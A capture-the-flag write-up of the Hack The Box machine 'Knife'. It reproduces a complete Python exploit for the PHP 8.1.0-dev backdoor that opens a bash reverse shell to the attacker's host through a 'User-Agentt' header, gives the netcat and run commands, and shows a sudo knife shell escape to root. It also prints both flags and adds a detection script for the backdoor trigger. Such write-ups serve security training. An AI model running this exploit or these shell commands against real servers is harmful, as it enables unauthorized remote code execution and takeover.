# Knife

<figure><img src="/files/ObyG73otCSsfSXnuuJAQ" alt=""><figcaption></figcaption></figure>

## TARGET IP: 10.10.10.242

## HOST IP: 10.10.16.3

## RECON

### WEBSITE

```url
http://[TARGET IP]
```

<figure><img src="/files/sIAFnKIMXZXfhyIc8coq" alt=""><figcaption></figcaption></figure>

* The page looks like a typical medical site. The source doesn't have anything of note except for some JavaScript that handles the styling when the page first loads.
* There are also no links on the page or in the source code, other than third-party links.

<figure><img src="/files/nYiftQyM5W86pcLhCEi0" alt=""><figcaption></figcaption></figure>

* Wappalyzer gives us a lot of good information.
  * Apache web server v2.4.41
  * Backend --> PHP v8.1.0
    * This is the route to take. Wappalyzer doesn't show it here, but the full version is 8.1.0-dev.
  * OS --> Ubuntu
* A quick Google search shows that this Apache version has several published vulnerabilities, and Metasploit might even have a module for one of them.
* The Gobuster scan below found an `/index.php` page.
  * This is just the same home page.

### NMAP

```
nmap [TARGET IP]
```

<figure><img src="/files/eQrpqcTQdvU2neufIduK" alt=""><figcaption></figcaption></figure>

```
nmap [TARGET IP] -A -p 22,80
```

<figure><img src="/files/1FwAOPD6avdBtMEltbLb" alt=""><figcaption></figcaption></figure>

* We can confirm that the Apache web server is version 2.4.41.

```
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80
```

<figure><img src="/files/XBVVuGKkUleRvO3FnkNm" alt=""><figcaption></figcaption></figure>

### NIKTO

* This is my first time using Nikto, and it's an interesting tool.

```
nikto 10.10.10.242
```

<figure><img src="/files/7TugW4HvTFwUOMtbuS0I" alt=""><figcaption></figcaption></figure>

* This shows that the PHP version in use is `8.1.0-dev`.
  * A quick Google search shows that this is a development build of PHP with a major [vulnerability](/htb/getting-started-notes.md).

## ENUMERATION

### GOBUSTER

```
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/IBEHJEguvPsGKDEhRY8b" alt=""><figcaption></figcaption></figure>

```
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt -x php
```

<figure><img src="/files/NU21CVl6NZnz0SsTlmUO" alt=""><figcaption></figcaption></figure>

```
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/rE39q18pDfXJZvuZgJwe" alt=""><figcaption></figcaption></figure>

## EXPLOITATION

* Let's dive into possible exploits for the Apache version.
  * The [Apache](https://httpd.apache.org/security/vulnerabilities_24.html) website has a list of all vulnerabilities for the 2.4 branch, which is really handy.
  * Nothing stands out specifically for this version, but it may still be susceptible to multiple attacks.
  * I'm pretty sure this is not the route to go.
* Let's take a look

### METASPLOIT

* Tried a few exploits available but nothing really stuck.
* No luck here with Apache.

### PHP

* From the Nikto scan I found that the PHP version is 8.1.0-dev, which has a major vulnerability: a backdoor in the build that allows code execution on the server.
* I found a really useful Python [script](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py) that creates a reverse shell using this backdoor.

```python
#!/usr/bin/env python3
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link: 
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.

Usage:
  python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""

import sys, argparse, requests

request = requests.Session()

def check_target(args):
    # Fingerprint the backdoored build from the response headers (X-Powered-By / Server)
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False

def reverse_shell(args):
    payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
    # The backdoor evaluates whatever follows the "zerodium" marker in the User-Agentt header
    request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)

def main(): 
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
    parser.add_argument("url", metavar='<target URL>', help="Target URL")
    parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
    parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        sys.exit(1)

if __name__ == "__main__":
    main()
```

* I created a new file with the code snippet above and ran the following.

```
nc -lvnp 4444
```

```
python3 exploit.py http://[TARGET IP] [HOST IP] 4444
```

* Return to your netcat listener and you should now have a shell on the system.

![](/files/dzeHJvzLMgfqJjPyWCdM)

* Here is the user flag.

![](/files/zh8LWyxgS5El8mpWqsKl)

```
58a976dbd2240852f6910cab079cc7df
```
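Flipping the page's exploit around for the defender, here is an added detection example (my code, not the write-up's or flast101's script): it parses raw HTTP messages and flags requests whose `User-Agentt` header contains the `zerodium` marker that the backdoored php-src looked for, plus responses that advertise `PHP/8.1.0-dev`. The sample traffic and the `target.test` host are constructed.

```python
from typing import Dict, List, Tuple

# Trigger header and marker from the backdoor, and the banner the exploit script fingerprints.
TRIGGER_HEADER = "user-agentt"
TRIGGER_MARKER = "zerodium"
VULNERABLE_BANNER = "PHP/8.1.0-dev"


def parse_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP message into its start line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_backdoor_trigger(raw_request: str) -> bool:
    """True when User-Agentt contains 'zerodium'; the backdoor eval'd what followed it."""
    _, headers = parse_headers(raw_request)
    return TRIGGER_MARKER in headers.get(TRIGGER_HEADER, "")


def advertises_vulnerable_php(raw_response: str) -> bool:
    """True when X-Powered-By or Server names the 8.1.0-dev build."""
    _, headers = parse_headers(raw_response)
    return any(VULNERABLE_BANNER in headers.get(h, "") for h in ("x-powered-by", "server"))


def flagged_requests(raw_requests: List[str]) -> List[int]:
    """Indices of requests that would have triggered the backdoor."""
    return [i for i, r in enumerate(raw_requests) if is_backdoor_trigger(r)]


# Constructed sample traffic (not captured from the box).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: target.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.test\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.test\r\nUser-Agentt: Mozilla/5.0\r\n\r\n",
]
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\n\r\n<html></html>")

if __name__ == "__main__":
    print("requests hitting the backdoor:", flagged_requests(SAMPLE_REQUESTS))
    print("vulnerable banner seen:", advertises_vulnerable_php(SAMPLE_RESPONSE))
```

Apache's default combined log format records only `User-Agent`, so this check needs raw request capture (a reverse proxy, WAF, or pcap) rather than the access log.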

## PRIVILEGE ESCALATION

* Start by checking which commands the user is allowed to run with sudo.

```
sudo -l
```

<figure><img src="/files/faAUmeADfa63K0QZt8Xi" alt=""><figcaption></figcaption></figure>

* Let's go check out [GTFOBins](https://gtfobins.github.io/gtfobins/knife/#sudo) for a possible route to escalation.

![](/files/lywloxXmn9axkqvCvdID)

```bash
sudo knife exec -E 'exec "/bin/sh"'
```

![](/files/KLmZJ10FugNhlaOYXztY)

```
cat /root/root.txt
```

![](/files/HsorTwNTw5DCT9xfeHLG)

```
c0a6dfc2f007265b4eafecf32efebab9
```
